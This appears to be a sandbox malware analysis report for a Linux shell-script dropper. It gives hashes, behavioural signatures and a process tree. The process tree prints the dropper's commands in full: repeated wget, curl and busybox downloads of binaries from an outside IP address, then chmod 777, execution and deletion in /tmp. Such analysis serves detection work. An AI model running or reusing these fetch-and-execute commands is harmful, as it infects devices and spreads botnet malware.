Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21-11-2024 08:36
Static task
static1
Behavioral task
behavioral1
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
-
Size
10KB
-
MD5
8abf2434594ba2dffa54b25832749b54
-
SHA1
0e89289d57c7377b331a82fbfaca526ccd8bb78e
-
SHA256
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c
-
SHA512
02c0ada458d3f0b7d057957c42ac1ed0493daa06e48ff877c07a7120a3cd5a5e88dc2ba46a95cc6c2752b8f570c19a697220bc733f2c8653c42d770e7aa033a1
-
SSDEEP
96:KVh5RKWVHduuHsnbBWwwiDcO0UCn14IuuHsnbRWwwiDqOVvhkEy1n44h5RKWVRNs:KxL8a1DrE
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 733 chmod 853 chmod 770 chmod 841 chmod 847 chmod 871 chmod 877 chmod 889 chmod 925 chmod 937 chmod 955 chmod 726 chmod 806 chmod 859 chmod 883 chmod 895 chmod 901 chmod 913 chmod 919 chmod 931 chmod 943 chmod 742 chmod 799 chmod 865 chmod 907 chmod 949 chmod -
Executes dropped EXE 26 IoCs
ioc pid Process /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 727 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC 734 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC 743 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 771 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW 800 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 808 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 842 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 848 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 854 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 860 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 866 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 872 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 878 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff 884 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 890 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 896 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 902 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 908 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 914 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 920 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 926 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff 932 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 938 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC 944 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC 950 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 956 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 802 wget 803 curl 804 busybox 808 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 811 rm -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC curl File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 curl File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC curl File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW curl File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff curl File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 curl File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC curl File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 curl File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 curl File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW curl File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff curl File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ curl File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC curl
Processes
-
/tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh/tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh1⤵PID:696
-
/bin/rm/bin/rm bins.sh2⤵PID:700
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:704
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:713
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:724
-
-
/bin/chmodchmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:728
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:730
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:732
-
-
/bin/chmodchmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:735
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:736
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:738
-
-
/bin/chmodchmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:747
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:748
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:764
-
-
/bin/chmodchmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:775
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:777
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:796
-
-
/bin/chmodchmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:801
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:802
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:804
-
-
/bin/chmodchmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:808
-
-
/bin/rmrm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:812
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:840
-
-
/bin/chmodchmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:843
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:844
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:846
-
-
/bin/chmodchmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:849
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:850
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:852
-
-
/bin/chmodchmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:858
-
-
/bin/chmodchmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:861
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:862
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:864
-
-
/bin/chmodchmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:867
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:868
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:870
-
-
/bin/chmodchmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:873
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:874
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:876
-
-
/bin/chmodchmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:879
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:880
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:882
-
-
/bin/chmodchmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:885
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:886
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:888
-
-
/bin/chmodchmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:891
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:892
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:894
-
-
/bin/chmodchmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:897
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:898
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:900
-
-
/bin/chmodchmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:903
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:904
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:906
-
-
/bin/chmodchmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:909
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:910
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:912
-
-
/bin/chmodchmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:915
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:916
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:918
-
-
/bin/chmodchmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:921
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:922
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:924
-
-
/bin/chmodchmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- File and Directory Permissions Modification
PID:925
-
-
